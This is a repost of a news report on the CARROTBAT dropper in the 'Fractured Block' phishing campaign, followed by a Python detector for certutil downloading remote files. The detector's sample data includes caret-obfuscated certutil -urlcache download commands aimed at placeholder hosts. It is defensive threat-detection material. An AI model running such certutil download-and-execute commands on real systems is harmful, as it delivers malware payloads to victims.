Phishing campaign spreading CARROTBAT dropper focuses on cryptocurrency...
Quote: A phishing campaign targeting the Korean peninsula is using a malicious dropper called CARROTBAT to deliver decoy documents and secondary payloads such as remote access trojans to its victims.

Dubbed Fractured Block, the campaign began last March, but has noticeably picked up steam in the last three months, according to a blog post by Josh Grunzweig and Kyle Wilhoit, researchers at Palo Alto Networks’ Unit 42 division.

Unit 42 has so far identified 29 unique CARROTBAT samples, noting that their final payloads have varied between the FTP-based RAT SYSCON and the recently discovered Oceansalt malware implant that uses code associated with APT1 (aka Comment Crew), a reputed Chinese APT actor.

Unit 42 describes CARROTBAT as “a dropper that allows an attacker to drop and open an embedded decoy file” saved as one of 11 different formats, “followed by the execution of a command that will download and run a payload on the targeted machine. This command will attempt to download and execute a remote file via the Microsoft Windows built-in certutil utility.”

Source: https://www.scmagazine.com/home/security...interests/
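
As an added example (not part of the original post or the quoted article), the following Python code flags process command lines in which certutil is asked to fetch a remote file, the behaviour Unit 42 describes for CARROTBAT. The `-urlcache` and `-verifyctl` verbs are real certutil options but are not named on the page; the function names, sample command lines and `example.invalid` hosts are constructed for illustration.

```python
import re

# Assumption: process-creation events (e.g. Sysmon Event ID 1, Windows 4688)
# have already been reduced to plain command-line strings.
CERTUTIL = re.compile(r"(?:^|[\\/\s\"'&|(])certutil(?:\.exe)?(?=$|[\s\"'])", re.I)
# certutil verbs that can retrieve remote content; '-' and '/' prefixes both work.
FETCH_VERB = re.compile(r"(?:^|\s)[-/](urlcache|verifyctl)\b", re.I)
URL = re.compile(r"\b(?:https?|ftp)://[^\s\"']+", re.I)


def normalize(cmdline):
    """Undo cmd.exe caret escaping (cer^tutil) and collapse whitespace."""
    return re.sub(r"\s+", " ", cmdline.replace("^", "")).strip()


def certutil_download(cmdline):
    """Return (verb, url) if certutil is asked to fetch a URL, else None."""
    line = normalize(cmdline)
    exe = CERTUTIL.search(line)
    if not exe:
        return None
    args = line[exe.end():]
    verb, url = FETCH_VERB.search(args), URL.search(args)
    if verb and url:
        return verb.group(1).lower(), url.group(0)
    return None


def scan(cmdlines):
    """Return (index, verb, url) for every command line that matches."""
    hits = []
    for i, c in enumerate(cmdlines):
        hit = certutil_download(c)
        if hit:
            hits.append((i, *hit))
    return hits


# Constructed sample command lines (hosts and paths are placeholders).
SAMPLES = [
    r"cmd.exe /c cer^tutil -url^cache -split -f http://files.example.invalid/a.txt a.txt",
    r'"C:\Windows\System32\certutil.exe" /urlcache /f ftp://example.invalid/x.bin x.bin',
    r"certutil -hashfile C:\Users\a\setup.iso SHA256",   # benign: hashing a file
    r"certutil -urlcache *",                              # benign: lists the cache
    r"curl http://example.invalid/certutil-urlcache.txt", # not certutil at all
]

if __name__ == "__main__":
    for idx, verb, url in scan(SAMPLES):
        print(f"sample {idx}: certutil -{verb} fetching {url}")
```

The parent process of a hit is worth recording alongside it, since certutil fetching a URL from under a document viewer or script host is far less common than from an administrator's shell.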